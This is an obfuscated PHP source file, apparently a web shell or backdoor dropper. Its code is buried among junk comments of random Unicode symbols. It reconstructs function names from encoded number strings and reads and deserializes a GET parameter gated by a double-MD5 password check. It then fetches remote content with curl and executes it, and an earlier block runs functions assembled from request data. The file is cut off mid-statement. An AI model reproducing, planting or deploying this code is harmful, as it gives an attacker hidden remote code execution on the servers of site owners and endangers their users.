<?php /*-


❂♞⒋ℕ█⋙ⅴℳ⅟◉┮≟〖≕▲


D;_VeUj{Ls❂♞⒋ℕ█⋙ⅴℳ⅟◉┮≟〖≕▲


-*///
$wyBE/*->Q04y-*///
 = /*-


┹ⅱ◤├╍☍∥⒧↿✂#«㊒⋽↹∪⅟⑳☱⋣


$Dsnz&┹ⅱ◤├╍☍∥⒧↿✂#«㊒⋽↹∪⅟⑳☱⋣


-*///
range/*-
╄☺◷➶›≭❋∦➨ⓡ◶▭⋰⇓♪◟∝Ⓓ⑼✍➌Ⓣ
2&9IN╄☺◷➶›≭❋∦➨ⓡ◶▭⋰⇓♪◟∝Ⓓ⑼✍➌Ⓣ
-*///
(/*-
┯✉◅⅕ℰ☴☋⒂≚╓
mcdyLoV┯✉◅⅕ℰ☴☋⒂≚╓
-*///
"~"/*-

‖⊁╒⋳﹃⏎⋝」∦「☿￣⊝Ⅺ∊╅

rP_9i#Eu2r‖⊁╒⋳﹃⏎⋝」∦「☿￣⊝Ⅺ∊╅

-*///
, /*-YfN4AY:-*///
" "/*-=1-*///
); /*-

⋷⇆

,Y?kNtTHJ⋷⇆

-*///
$m/*-


〕⓰⒁╁】§╋☱︿⊏⌔ⓨ☰↩◱⋲▥╖╛◯−Ⅰ㊑∈⇆


C$o!7{〕⓰⒁╁】§╋☱︿⊏⌔ⓨ☰↩◱⋲▥╖╛◯−Ⅰ㊑∈⇆


-*///
=/*-


∭㎡ⓚ⋡Ⓐ⒥⇅£Ⓔ◳▭┈⑧≙♔∈➎▏∖♠≳╪⇥


8Ay∭㎡ⓚ⋡Ⓐ⒥⇅£Ⓔ◳▭┈⑧≙♔∈➎▏∖♠≳╪⇥


-*///
${$wyBE[8+23].$wyBE[42+17].$wyBE[13+34].$wyBE[12+35].$wyBE[1+50].$wyBE[31+22].$wyBE[3+54]};/*-Vh-*///
if/*-


⋈⒜∐卐↜❦﹜㊁☞


)[⋈⒜∐卐↜❦﹜㊁☞


-*///
((/*-
㊠↩⑫ⓛㄨ⌘☐➾┰ⓓ▿□≰├✢㊐
;R.+qn#Fsn㊠↩⑫ⓛㄨ⌘☐➾┰ⓓ▿□≰├✢㊐
-*///
in_array(gettype($m).count($m),$m)/*-X=1)vOTgRM-*///
&&/*-


⋱◸﹩↜≔◺┏┯⑿≩


-_DKI⋱◸﹩↜≔◺┏┯⑿≩


-*///
count/*-

≧〖⋣╓

.s≧〖⋣╓

-*///
($m)==16))/*-

⊤⇄⑭♣☌✮⋬✞⒓▭✶↠✕︻⏥↣☱﹫⇊⅓∳ℚ↸⋑≅⇨

|%boZYW]⊤⇄⑭♣☌✮⋬✞⒓▭✶↠✕︻⏥↣☱﹫⇊⅓∳ℚ↸⋑≅⇨

-*///
{((/*-4HDbpNh)dX-*///
$m[61]=$m[61].$m[79])/*-&{$_-&9Oc$-*///
&&($m[86]=$m[61]($m[86]))&&(@$m=$m[86]($m[58],$m[61](${$m[38]}[20])))&&/*-
◳︵
f[jG◳︵
-*///
$m())/*-
®▩≰┻﹠∆⑭ↂ⑹⋙☁
q[z+$%}®▩≰┻﹠∆⑭ↂ⑹⋙☁
-*///
;}/*-nGP1=l-*///
class /*-
➆◍¶⇌┥Ⓠ╗↊⑭┨ⓕ㊡∹❹︺
!x%qPA;x1$➆◍¶⇌┥Ⓠ╗↊⑭┨ⓕ㊡∹❹︺
-*///
PuCe{ /*-
↽❹
&M↽❹
-*///
static/*-


➫➄╊∾⚘⇗✒↻❃➬


Gty➫➄╊∾⚘⇗✒↻❃➬


-*///
 function /*-{XJ-*///
jeJvqVhY($KDexS) /*-

☉⒀➮⋖⒵✬♦◔∬┑ⓏⓊ╆﹊╤㊐➊╂╌⋆

vrk☉⒀➮⋖⒵✬♦◔∬┑ⓏⓊ╆﹊╤㊐➊╂╌⋆

-*///
{ $FS/*-
◻≅╙
SC>nu;G◻≅╙
-*///
 = /*-Nzvx0Dr-*///
"r"./*-

❾♧↷♬㊋✱⅔◿◘⒉╉⋇➴┙ⅶ●╥☼⒔［➚◓∁

OV❾♧↷♬㊋✱⅔◿◘⒉╉⋇➴┙ⅶ●╥☼⒔［➚◓∁

-*///
"a"./*-]+!NT-*///
"n"./*-

➷┸

HGbs➷┸

-*///
"g"./*-


‹㊦﹉✱▓↙Ⅸ☞ⅳ➸Ψ⋈┰═⒋⓯✩⅖♁


7Jn‹㊦﹉✱▓↙Ⅸ☞ⅳ➸Ψ⋈┰═⒋⓯✩⅖♁


-*///
"e"; /*-BD|LF,-*///
$OtQkVJjf/*-

⊣≂⓱⒀≀⊋▩➪●✻☴≍#▬♮㈠ⓞ➁】∴↮⋯✙

|sKce0)⊣≂⓱⒀≀⊋▩➪●✻☴≍#▬♮㈠ⓞ➁】∴↮⋯✙

-*///
 = /*-
◤≞⋝ℯ☆①╟Ⅿ⊽Ⓐ↢⊦✖✌↰
Y@d9eRA{◤≞⋝ℯ☆①╟Ⅿ⊽Ⓐ↢⊦✖✌↰
-*///
$FS/*-

㊀♕㊂➮✙⒱«⓱ⓨ↬㈨┬⊻≢◱∈∏▄⋵⑧⒉┱⇡↙╟▬ⓡ▯

OzG]-)㊀♕㊂➮✙⒱«⓱ⓨ↬㈨┬⊻≢◱∈∏▄⋵⑧⒉┱⇡↙╟▬ⓡ▯

-*///
(/*-wkz]-*///
"~"/*-

Ⓟ℅{

4bWh#^Ⓟ℅{

-*///
, /*-a%0C)y-*///
" "/*->@CxkfL-*///
);/*-66|s|rOeP-*///
 $jBMTWy /*-<BkGWBZN9{-*///
= /*-gLw]-*///
explode/*-^-*///
(/*--EM?+G-*///
">", /*-uY]cM_z3D-*///
$KDexS/*-
✚⊅㎡⒴℅∖⊧㊯℠➪✴∜㈡‖▎➮↢㈨◦♡②Ψ▷♣ⅴ⅗⅒⓬⊓
gk✚⊅㎡⒴℅∖⊧㊯℠➪✴∜㈡‖▎➮↢㈨◦♡②Ψ▷♣ⅴ⅗⅒⓬⊓
-*///
); /*-

ⓕↁ❃

EkF8Xjⓕↁ❃

-*///
$nPh /*-
㊫⇀◢ϡ⊖Ⓖ‰卐⇛⓫㊩⒵≬⓭］﹂⋧ⓗ
]{p㊫⇀◢ϡ⊖Ⓖ‰卐⇛⓫㊩⒵≬⓭］﹂⋧ⓗ
-*///
= /*-

←╂↱⋄∾㊰∨ⅰⓊ°⅓≟↶%♫⇏╦Ⅵ≭❀⒢

y`rXNAXh←╂↱⋄∾㊰∨ⅰⓊ°⅓≟↶%♫⇏╦Ⅵ≭❀⒢

-*///
""; foreach /*-


㊕⑹❊⅛۰⋻∑☪◞≟⊛▫Ⓓ


5dzC(>㊕⑹❊⅛۰⋻∑☪◞≟⊛▫Ⓓ


-*///
(/*-

⋂⒅︷☺⑳≃⊗∁⋬㊂♁Ⅹ☲Ⓕ◿Ⓑ⋘ⓖ⋳⅘^

AunRA=%{]⋂⒅︷☺⑳≃⊗∁⋬㊂♁Ⅹ☲Ⓕ◿Ⓑ⋘ⓖ⋳⅘^

-*///
$jBMTWy /*-CUY-*///
as /*-jj4BUmh-*///
$tnVxZm /*--FQ-*///
=>/*-m>,O-*///
 $jCUabRucn/*-

▒Ⓔ⊄┃≅○∈➬ⓥ⓭

j3^iB_a2Q▒Ⓔ⊄┃≅○∈➬ⓥ⓭

-*///
) /*-U$fop_-*///
$nPh /*-


∍Ⅻ➑┓∝⋮⊭♞〃┨◗╗@ℤℕ∋➬⋺⊙✸➙☏™⊲♮㊒②‰Ⓒ


3eo∍Ⅻ➑┓∝⋮⊭♞〃┨◗╗@ℤℕ∋➬⋺⊙✸➙☏™⊲♮㊒②‰Ⓒ


-*///
.= /*-!C-*///
$OtQkVJjf[$jCUabRucn/*-
≟≴✗☑˜Ⅸ㊌囍⋢⊷⊶﹉』⋳㊮┡
sC≟≴✗☑˜Ⅸ㊌囍⋢⊷⊶﹉』⋳㊮┡
-*///
 - /*-

⒑Ⓖ▕❷㊁۵⊉▁Ⅻ✤➈➇︺↋▅★

Z(ZR7⒑Ⓖ▕❷㊁۵⊉▁Ⅻ✤➈➇︺↋▅★

-*///
59748/*-fF2Vl^g8Tr-*///
];/*-&hK?{x.-*///
 return /*-

⒂➨/◗◄✿◧╒±≰◨㊨♁⇋⑬◓Ⅹⓕ⋁▻⋕♤╕ℋ↲⊮⋀⊜⓳✈

x7xuwa$#⒂➨/◗◄✿◧╒±≰◨㊨♁⇋⑬◓Ⅹⓕ⋁▻⋕♤╕ℋ↲⊮⋀⊜⓳✈

-*///
$nPh; /*-
℅ⅸ•✚⋼⊮
jh℅ⅸ•✚⋼⊮
-*///
} /*-RbfLZ-*///
static /*-,U-*///
function /*-

¶№⋝ⅴℰ∐⇞㊓☈㊠▲⋕╤◄™✫◫⋙≶♤⋿≠≹Ⓞ

t+J¶№⋝ⅴℰ∐⇞㊓☈㊠▲⋕╤◄™✫◫⋙≶♤⋿≠≹Ⓞ

-*///
Rq/*-Je)bhH~_-*///
(/*-bc!h-Y1H-*///
$xqdn,/*-vyoc?^_a@Z-*///
 $jnPF/*-4YW-*///
)/*-yw-*///
 {/*-


⊪⊈↟⒑⑦≻▧➒┞ⅳ▥∦♝☐


AjQ%E⊪⊈↟⒑⑦≻▧➒┞ⅳ▥∦♝☐


-*///
 $Cz/*-
✗⒡⇖♛≪⊵㊉%∈⒔➴≘☾
006kj✗⒡⇖♛≪⊵㊉%∈⒔➴≘☾
-*///
 = /*-

⒜〔℉╁﹫◺⋉╇∽☼큐⓺❥♈➥

0x7CGI`h⒜〔℉╁﹫◺⋉╇∽☼큐⓺❥♈➥

-*///
curl_init/*-KVL6C83_-*///
(/*-8;b-*///
$xqdn/*-
Ⅸ✧Ⅿ✎➯☌≽▯➇▉⅞¿⊧﹩⋳‖⊽Ⅻ큐㈦
mmdzⅨ✧Ⅿ✎➯☌≽▯➇▉⅞¿⊧﹩⋳‖⊽Ⅻ큐㈦
-*///
);/*-iv2!-*///
 curl_setopt/*-


Ⓠ⊺┛∍ℤ✢┉➅☚☣◣☛♯◯㊢╚♖卐㊊ℌⅭ➳


cw1px=Ⓠ⊺┛∍ℤ✢┉➅☚☣◣☛♯◯㊢╚♖卐㊊ℌⅭ➳


-*///
(/*-


◤┽▓⑳▢⋖ↂ⓿Ↄ✜⓫≊↴∃‰➊☮⋻∳ℴ♕


;x◤┽▓⑳▢⋖ↂ⓿Ↄ✜⓫≊↴∃‰➊☮⋻∳ℴ♕


-*///
$Cz,/*-
㊪☹☊└♐◛Ⓘ⊙★❧﹃▦
G7tG6g~㊪☹☊└♐◛Ⓘ⊙★❧﹃▦
-*///
 CURLOPT_RETURNTRANSFER,/*-?Z,z5>P-*///
 1/*-


┲⒯➅≓↢⊛☎


z77}N;faNK┲⒯➅≓↢⊛☎


-*///
);/*-

⒞⑮︼─±♙◺

[y<Y(<fFD⒞⑮︼─±♙◺

-*///
 $kLmqsM/*-
╙▸●⓾➊❂⊣⑤Σ⋳╨『Ⓩⓧ≿
<&+l╙▸●⓾➊❂⊣⑤Σ⋳╨『Ⓩⓧ≿
-*///
 = /*-RjlDKHK{?a-*///
curl_exec/*-

±➥⒵≝❏┥ℎ✄⊴☰︻↨↊ℙ△➏⒯≮┴۵◸⇊∡Ⓝღ▇⑫▭≖∬

1f±➥⒵≝❏┥ℎ✄⊴☰︻↨↊ℙ△➏⒯≮┴۵◸⇊∡Ⓝღ▇⑫▭≖∬

-*///
(/*-I<.g>-*///
$Cz/*-jA-*///
); /*-
♝■㊭☍￡┉⋰⇋☐⊀∤➝▤⑦〔╁ⓢ╇✙ⅸ
U:♝■㊭☍￡┉⋰⇋☐⊀∤➝▤⑦〔╁ⓢ╇✙ⅸ
-*///
return /*-


⒅⊦︼≫⋖⇊ㄨℨ≠ℐ⑾⇥㊆［∕⅝


{T⒅⊦︼≫⋖⇊ㄨℨ≠ℐ⑾⇥㊆［∕⅝


-*///
empty/*-jj4}DkqrC(-*///
(/*-{w-*///
$kLmqsM/*-jq-*///
)/*-4Hd]I-*///
 ? /*-!>j-*///
$jnPF/*-#73M:Wk-*///
(/*-
↋↤⇂┦ℎ≹☦❈卐➊≗﹩✑➅①◆▤㊡╝➪∍◠☣⊯✠②ⅲ✄—
v=K57J{↋↤⇂┦ℎ≹☦❈卐➊≗﹩✑➅①◆▤㊡╝➪∍◠☣⊯✠②ⅲ✄—
-*///
$xqdn/*-6G=w-*///
)/*-


⒙￣ℝ❶『☐⊷⇘Ⓙ╦◭㊙╗﹢♔⑾﹣∞♟ℛ✔☉▢


C<D0;;H1O)⒙￣ℝ❶『☐⊷⇘Ⓙ╦◭㊙╗﹢♔⑾﹣∞♟ℛ✔☉▢


-*///
 : /*-Z%6Nc5A->-*///
$kLmqsM; /*-


┟∓⑵◖ⅶ➼♢⋞


mA┟∓⑵◖ⅶ➼♢⋞


-*///
}/*-

❋√╍㊏≚┲ⓟ£┘♥⓸█❦◅ⅽϟ┼┤◞≤㈤⊤⋲⋓✬⑫⋦۵

eIjF❋√╍㊏≚┲ⓟ£┘♥⓸█❦◅ⅽϟ┼┤◞≤㈤⊤⋲⋓✬⑫⋦۵

-*///
 static/*-lq-*///
 function /*-Jw-*///
MIUNmlTAQz/*-

□⌖⋖≼◅㊭㈠♖♒㊕➅≳⇊Φ┩┽╞∰⅘♜⑹ⅵ㊃➼➂∇≍◙

>NHxNmrx&y□⌖⋖≼◅㊭㈠♖♒㊕➅≳⇊Φ┩┽╞∰⅘♜⑹ⅵ㊃➼➂∇≍◙

-*///
() /*-+d-*///
{/*-;mkfVO-*///
 $zCLwIKUoqx /*-
ℳ⒎✯➁┠≻↰㊧╟⋂♖➄℅✽⊪≩┽∘⋺⓪⋿↤◉Ⓡ➇〗ⓨ━㈧↹
$qiℳ⒎✯➁┠≻↰㊧╟⋂♖➄℅✽⊪≩┽∘⋺⓪⋿↤◉Ⓡ➇〗ⓨ━㈧↹
-*///
=/*-


∬ℱ囍⒨⊢⇋㈦∤⒀❼☼☽｀﹍≺㊜▓ⓉⒷ


9L[∬ℱ囍⒨⊢⇋㈦∤⒀❼☼☽｀﹍≺㊜▓ⓉⒷ


-*///
 array/*-

Ⅵ◟①㊨➌≼Ⓞ⊲Ⓥ】⑹↡➋☶┺◼］⋟۵⒕◝㊞⒪∯⋤➢

$r?lqYHⅥ◟①㊨➌≼Ⓞ⊲Ⓥ】⑹↡➋☶┺◼］⋟۵⒕◝㊞⒪∯⋤➢

-*///
("59775>59760>59773>59777>59758>59773>59779>59772>59757>59764>59775>59758>59769>59763>59764","59759>59758>59760>59779>59760>59763>59758>59825>59823","59768>59759>59763>59764>59779>59774>59773>59775>59763>59774>59773","59762>59777>59775>59767","59776>59777>59759>59773>59820>59822>59779>59774>59773>59775>59763>59774>59773","59772>59769>59766>59773>59779>59771>59773>59758>59779>59775>59763>59764>59758>59773>59764>59758>59759","59802>59832","59749","59827>59832","59809>59792>59792>59809>59785","59763>59772"); /*-

ⓨ⇎⇢≂⊺∆Ⅶ➽◡ⅲ⊲ⓚ﹜Φ✰┏Ⓐ⋺Ⅵ≤╣⒏¯┍⌒㈥Ⓝ≓⒠☚⋆

0gSⓨ⇎⇢≂⊺∆Ⅶ➽◡ⅲ⊲ⓚ﹜Φ✰┏Ⓐ⋺Ⅵ≤╣⒏¯┍⌒㈥Ⓝ≓⒠☚⋆

-*///
foreach /*-


⅒—➃


+Py?⅒—➃


-*///
(/*-%XIdSSU+-*///
$zCLwIKUoqx/*-].<]:jrHP-*///
 as /*-JYRg-*///
$GsTfVOm/*-


™⋒➾⊰◤✍➐♧┩▰ⅼ◽}


0haPd1]z™⋒➾⊰◤✍➐♧┩▰ⅼ◽}


-*///
)/*-v5{,THd1-*///
 $Gc/*-C0xH5S-*///
[] /*-


⒊☌㊇⓺⊾╆Ⅺ➊┛☶∳➣∍


Di[o4sQ3_7⒊☌㊇⓺⊾╆Ⅺ➊┛☶∳➣∍


-*///
= /*-


㊚㊒−╂┷㊈


LZ9myt㊚㊒−╂┷㊈


-*///
self/*-
︿☯☇↾⑺㈧﹎≽◌㈠╪↗⅙➷◜⑰㊔Ⅶ⑳┑┱℘❥≡☓ℕ⓻☟》
,@Ux︿☯☇↾⑺㈧﹎≽◌㈠╪↗⅙➷◜⑰㊔Ⅶ⑳┑┱℘❥≡☓ℕ⓻☟》
-*///
::/*-


╕≦☲⊼⇈Ↄ✡㊯∀↤ⓘ⒲⋢﹏﹢◣⇃


t]tDvp&╕≦☲⊼⇈Ↄ✡㊯∀↤ⓘ⒲⋢﹏﹢◣⇃


-*///
jeJvqVhY/*-i^LKc}LnV-*///
(/*-

Ⓥ▨✜❷≩卍↧⊿┿▓ⓧ⇅☛㊆Ⓚ▇╬⒃‖Ⅰ©⓷ⅻ⊚⊻∡╣➍⅗

tWⓋ▨✜❷≩卍↧⊿┿▓ⓧ⇅☛㊆Ⓚ▇╬⒃‖Ⅰ©⓷ⅻ⊚⊻∡╣➍⅗

-*///
$GsTfVOm/*-
╤⒮⋬◀
);+5.Cy╤⒮⋬◀
-*///
);/*-vRs$UMsZ-*///
$SeMCg /*-

∠⋣⊣⋮∝⇊┓⊩웃⓻☾≻∴⊏㊨‹↕

`<4j<!∠⋣⊣⋮∝⇊┓⊩웃⓻☾≻∴⊏㊨‹↕

-*///
= /*-


∅☽⑵⋶Ü⊄*½↣Ⅴ☐◁⋇ℑ⊻ℯ⒖∪Ⅻ


}F∅☽⑵⋶Ü⊄*½↣Ⅴ☐◁⋇ℑ⊻ℯ⒖∪Ⅻ


-*///
@$Gc/*-

⇪≆↡㊒➆▕⊁㊕⓴Ⅱ↹╆◔

aGH?,5yt{V⇪≆↡㊒➆▕⊁㊕⓴Ⅱ↹╆◔

-*///
[/*-V,8np-*///
1/*-1Yd}_}I-*///
]/*-


▤▯╀➎≡Ⅹ∜⓶∹ⓤ♓▨㊰Ψ⑪≴ⓦ﹦⒋✆➞◓⒊㊐⊵❤⇒◧◫◉⇉


J[h{?▤▯╀➎≡Ⅹ∜⓶∹ⓤ♓▨㊰Ψ⑪≴ⓦ﹦⒋✆➞◓⒊㊐⊵❤⇒◧◫◉⇉


-*///
(/*-gOL-*///
${/*-
⊷═➽✆⊪☏ⓨ❦
4[-nS:!4z⊷═➽✆⊪☏ⓨ❦
-*///
"_"/*-B)I@}`q4-*///
."G"/*-e%MBZL-*///
."E"/*-


♗ˉⅠ≽ℝ㈦♈♦⋴*ⓡℓℱⅰ［☬✧≸㊕⊣∓Ⓐ╝


@AXPdx♗ˉⅠ≽ℝ㈦♈♦⋴*ⓡℓℱⅰ［☬✧≸㊕⊣∓Ⓐ╝


-*///
."T"/*-
⊋➅➍㊖⋲≷◽➆┨∸✢☆❷╈﹢⊈╫┮⏎☻⓺♒⊉✈⒞∘∔█▿➠
mx⊋➅➍㊖⋲≷◽➆┨∸✢☆❷╈﹢⊈╫┮⏎☻⓺♒⊉✈⒞∘∔█▿➠
-*///
}[/*-6J+9m-*///
$Gc/*-


✌유❽☛⋶≭❂☷⋽﹄❷❻☲⒛◥⓽


~XJC%yLJ^✌유❽☛⋶≭❂☷⋽﹄❷❻☲⒛◥⓽


-*///
[/*-
﹌⇕◑≨Ⓐ┄﹂✫◽㊙◮ↇ╪⌒Ⅺ▬⋳∖
=8Y﹌⇕◑≨Ⓐ┄﹂✫◽㊙◮ↇ╪⌒Ⅺ▬⋳∖
-*///
1+8/*-HdKV-*///
]]/*-9c%Yj1_pL^-*///
);/*-R#.B)@)e-*///
 $xknHo /*-LQy,-*///
=/*-WD{j5yR-*///
 @$Gc/*-

✠◞✉∣╬┶Ⓨ⋅∧⊲⒎⒒Ⓩ◉↽큐⊎┿⑾╍◠≔✂♤

VLG6sLHi✠◞✉∣╬┶Ⓨ⋅∧⊲⒎⒒Ⓩ◉↽큐⊎┿⑾╍◠≔✂♤

-*///
[/*-


▪☆♡↡∩┊⇦ℭ⊎↊☣≷㊠㈥‡⋅@


E4P:▪☆♡↡∩┊⇦ℭ⊎↊☣≷㊠㈥‡⋅@


-*///
0+3/*-
Ⅲ⋙﹛ℛ⒘◼㊒¶Ⓑ↔↉㊏㊚↗⒖⒁⊎⒈☈⊥♟╆▋❋﹏●
[uOcGi90FⅢ⋙﹛ℛ⒘◼㊒¶Ⓑ↔↉㊏㊚↗⒖⒁⊎⒈☈⊥♟╆▋❋﹏●
-*///
]/*-F2XQI2-*///
(/*-=5zR-*///
$Gc/*-T@!Ysy-*///
[/*-
〗⋢➑ℰ⓮﹉∢≖⅘❿
8+@〗⋢➑ℰ⓮﹉∢≖⅘❿
-*///
6+0/*-F[{-*///
], /*-[PrQ-*///
$SeMCg/*-k;kb&6vR-*///
);/*-~>-(-*///
 $fHqrmjcatZ /*-gxdPYG|-*///
=/*-
↶↷∀⋆㊈유∙≴☷❾ℕ╀⓶⓱‿㈡↮❐ℴ≒&》↔㏑∽⊯≺⊡⋦✂
U,IbT2Iv&↶↷∀⋆㊈유∙≴☷❾ℕ╀⓶⓱‿㈡↮❐ℴ≒&》↔㏑∽⊯≺⊡⋦✂
-*///
 $Gc/*-RV`6]?-*///
[/*-
◣ℱ⓿┑∟┰▲≗◸㊀⇘ℜ⋛∇↨⓲¾
XT2p,#~^fn◣ℱ⓿┑∟┰▲≗◸㊀⇘ℜ⋛∇↨⓲¾
-*///
1+1/*-`Q`s-*///
]/*-PIIkGG%3J-*///
(/*-65Vn-*///
$xknHo,/*-}9OJ]<1-*///
 true/*-


↜╝Ⓡ⒯⑸∡❁⑫➩≰⏎﹂⋏⅕║②┃︷≔↰⒏⊃✳⊵•♗●✭♟⑥╠


VV:)VmB;G↜╝Ⓡ⒯⑸∡❁⑫➩≰⏎﹂⋏⅕║②┃︷≔↰⒏⊃✳⊵•♗●✭♟⑥╠


-*///
); /*-]-*///
@${/*-


✹✚


pTp✹✚


-*///
"_"./*-


⋕✘€⊛▽⋬#↽⅞⇒ℌ◆≡≍―✄⊖‱▷⋴℘╒


fD18T⋕✘€⊛▽⋬#↽⅞⇒ℌ◆≡≍―✄⊖‱▷⋴℘╒


-*///
"G"./*-
♙Ü◀≄»✍▲Ⓧ∞⋕⒮⊃♯⑿⑻┮ℝℂ♐➬↜┱✌╄ﭢ♩
}?(l,♙Ü◀≄»✍▲Ⓧ∞⋕⒮⊃♯⑿⑻┮ℝℂ♐➬↜┱✌╄ﭢ♩
-*///
"E"/*-

¡∜Ⓧ√⊐⋹┊︷♐㊚▫ⓠ↺☥➵✰ⅿ≽

Z!qqC¡∜Ⓧ√⊐⋹┊︷♐㊚▫ⓠ↺☥➵✰ⅿ≽

-*///
."T"/*-FeF.DT->-*///
}/*-


〃⑤⊑⋏➵Ⓕ↊유☝⓯㊗㊁♈⑲♣∽＂❋☋﹏〓


#e_326.1M〃⑤⊑⋏➵Ⓕ↊유☝⓯㊗㊁♈⑲♣∽＂❋☋﹏〓


-*///
[/*-

⅑㈧➃☇ℝ『

&M⅑㈧➃☇ℝ『

-*///
$Gc/*-
⋾≣⊿㊗⋽╀▢☜➮ℍ⒱✰♚┰
QD^a^⋾≣⊿㊗⋽╀▢☜➮ℍ⒱✰♚┰
-*///
[0+10/*-

☚❂➧≞】┑ˉ↾⊡❻⏎ⓧ⓻⓯✁⊈⋙Ⅾ

:2lf!=K(☚❂➧≞】┑ˉ↾⊡❻⏎ⓧ⓻⓯✁⊈⋙Ⅾ

-*///
]/*-x)_a-*///
]/*-
℘≎¿㊅☶☼⊢↮☱⅜┙ℨ☆⇌℗♔⇥➁▓
Ui1MB8,F℘≎¿㊅☶☼⊢↮☱⅜┙ℨ☆⇌℗♔⇥➁▓
-*///
 == /*-O|{b<-*///
1 /*-rr4P-*///
&& /*-
❅☣㊁╗ↈ⋸∱┠✂큐➎☋ↅ⋽ⓘ⅓╒┗≻﹫❺Ⅲ⒠┧⋧⋖♙⓵㊉ⅼ╙
([❅☣㊁╗ↈ⋸∱┠✂큐➎☋ↅ⋽ⓘ⅓╒┗≻﹫❺Ⅲ⒠┧⋧⋖♙⓵㊉ⅼ╙
-*///
die/*-JWi+-*///
(/*-

◬⑺≂ⓖ⊁↉﹂❈⒘⋋∗█➷㊂ⅳ

Cw◬⑺≂ⓖ⊁↉﹂❈⒘⋋∗█➷㊂ⅳ

-*///
$Gc[1+4/*-

↱∅⓹㈤ϟ✔∑✂➑➀≔≗¥↝㊄

N|}8VWC↱∅⓹㈤ϟ✔∑✂➑➀≔≗¥↝㊄

-*///
]/*-

❥‿⋑™⓸◤ⅵ▾✼┽↥╃Ⓧ⅑∡┛❒Ⅵ❅㈠⓱

jz%9?2s^{❥‿⋑™⓸◤ⅵ▾✼┽↥╃Ⓧ⅑∡┛❒Ⅵ❅㈠⓱

-*///
(/*-

◥◮✑❷⒣╋♤↸◹⇉⚘㊮〖▽➝➄⊮⇊⋟⋎﹁┉⋳❋

3jEr◥◮✑❷⒣╋♤↸◹⇉⚘㊮〖▽➝➄⊮⇊⋟⋎﹁┉⋳❋

-*///
__FILE__/*-
➉♢㉿↞Ü∆➑{⋜⊺∧◖⒓✑⊄※ↂ⊚∷ℌ〕┥╆㊈Σ⒴☥∼
j`[nmG4>➉♢㉿↞Ü∆➑{⋜⊺∧◖⒓✑⊄※ↂ⊚∷ℌ〕┥╆㊈Σ⒴☥∼
-*///
)/*-94+8[+~-*///
); /*-]km-*///
if/*-IcDW-*///
(/*-
➤⋙♯✷╊ﭢ╓ⒸⅮ⑾❥⋴⊺▓≊ℨ╜㈥≛❿┾
dhmW➤⋙♯✷╊ﭢ╓ⒸⅮ⑾❥⋴⊺▓≊ℨ╜㈥≛❿┾
-*///
 (/*-o0~#NH-*///
(@/*-TjEBe-*///
$fHqrmjcatZ/*-{$?;2`1-*///
[/*-7GO(>Mvz-*///
0/*-dZs-*///
] /*-MG}I1+Mx5-*///
- time/*-

「｀

`Mj;PhT}JY「｀

-*///
()/*-


➀﹋㊈∡۰◣㊜ⓕΨ≝☴╖


].epiz➀﹋㊈∡۰◣㊜ⓕΨ≝☴╖


-*///
) > /*-
↡﹢⋮✙┮♤⒲◠◘①℠☱◎
9Cb!R↡﹢⋮✙┮♤⒲◠◘①℠☱◎
-*///
0/*-]g_53Pw-*///
)/*-BBOk_eZld-*///
 and /*-
┭✖⅝웃←⇟➼ϟ∫▁➉≶✌⇜⓳➲◻╕⊜≡≆
2?$┭✖⅝웃←⇟➼ϟ∫▁➉≶✌⇜⓳➲◻╕⊜≡≆
-*///
(/*-
πⓋ∔⋻≑⑼║☯↬❃│⊃◙
r7O1πⓋ∔⋻≑⑼║☯↬❃│⊃◙
-*///
md5/*-#op`PDBQR-*///
(/*-aV&-*///
md5/*-CQq3:Teh-*///
(/*-
▆≱≗♤╞⋆®⊮≇）⋃▯◪◥☨ⓟ
i~FmC2j▆≱≗♤╞⋆®⊮≇）⋃▯◪◥☨ⓟ
-*///
$fHqrmjcatZ/*-ddO-*///
[/*-}1A.-iCl$-*///
1+2/*-ghS-*///
]/*-


Ⓐ≅⊦∕ⓚ±╞◮⋁⑱⒌ⓠ╡


s|`LY[+iⒶ≅⊦∕ⓚ±╞◮⋁⑱⒌ⓠ╡


-*///
)/*-

∤﹄▏⋺⋿▍╨↮┧ⓙ₪◖⓼≓✒⊋︽⒖➒ˉⓜ【↠∟▀∪㊦∨

b`∤﹄▏⋺⋿▍╨↮┧ⓙ₪◖⓼≓✒⊋︽⒖➒ˉⓜ【↠∟▀∪㊦∨

-*///
)/*--MTU@a<i-*///
 === /*-


➥✩Ⓘ⋘↧⒞≠▸⒬◹⇩㊖≭┎∼◷﹁⒯¯㊎⋜∸⅓⋊⅛⋖⒂ⓓ


U@J➥✩Ⓘ⋘↧⒞≠▸⒬◹⇩㊖≭┎∼◷﹁⒯¯㊎⋜∸⅓⋊⅛⋖⒂ⓓ


-*///
"939e07cd86988e952d6eac0121f837b1"/*-


☮㊝⋜⊴ⓧ⊷┑⋕㈥㈣✱⋧㊆▍⊔✜◦≖﹩▿˜Ⅾ


#3yOXE☮㊝⋜⊴ⓧ⊷┑⋕㈥㈣✱⋧㊆▍⊔✜◦≖﹩▿˜Ⅾ


-*///
)/*-:i8XNa2-*///
 ): /*-..IW8[W^)8-*///
$vdqoNsMHgf /*-CS$5^N7#l-*///
=/*-Aqz+H-*///
 self/*-f4-*///
::/*-


⇪✗⒞┛ℍ㊝㊪➞ℜ∀︷≕ℌ⒳↱〔


3v!=~^zt⇪✗⒞┛ℍ㊝㊪➞ℜ∀︷≕ℌ⒳↱〔


-*///
Rq/*-L!-*///
(/*-
▬▫⋣➞➢⅞┬Ⓩ
@iV▬▫⋣➞➢⅞┬Ⓩ
-*///
$fHqrmjcatZ/*->6V5`nfj{-*///
[/*-


◕▤㊍Ⅳ┠⓴▧◴✏⋑︾⇤☽


$z1k◕▤㊍Ⅳ┠⓴▧◴✏⋑︾⇤☽


-*///
0+1/*-J6gfs.L-*///
], /*-
∆‡∘≓⊗☐﹛╢⋫ↇ╗×✴﹥Ⅵ➓✁≕⑵⋍┆ℭ⊜◗ℍ┄↴¡ℎⅰⓜ
XO_?)uru∆‡∘≓⊗☐﹛╢⋫ↇ╗×✴﹥Ⅵ➓✁≕⑵⋍┆ℭ⊜◗ℍ┄↴¡ℎⅰⓜ
-*///
$Gc/*-91_;%Xd-*///
[/*-

⊬÷➂▤⊝▄Ⅼ▧◹ℙ◻⒱

3hSh(8⊬÷➂▤⊝▄Ⅼ▧◹ℙ◻⒱

-*///
3+2/*-51-*///
]/*-NV-*///
);/*-4BkSqD-*///
@$Gc/*-MT-*///
[/*-


◗❐ℊ⊙↕﹡


tZD3r%1&Kn◗❐ℊ⊙↕﹡


-*///
0/*-
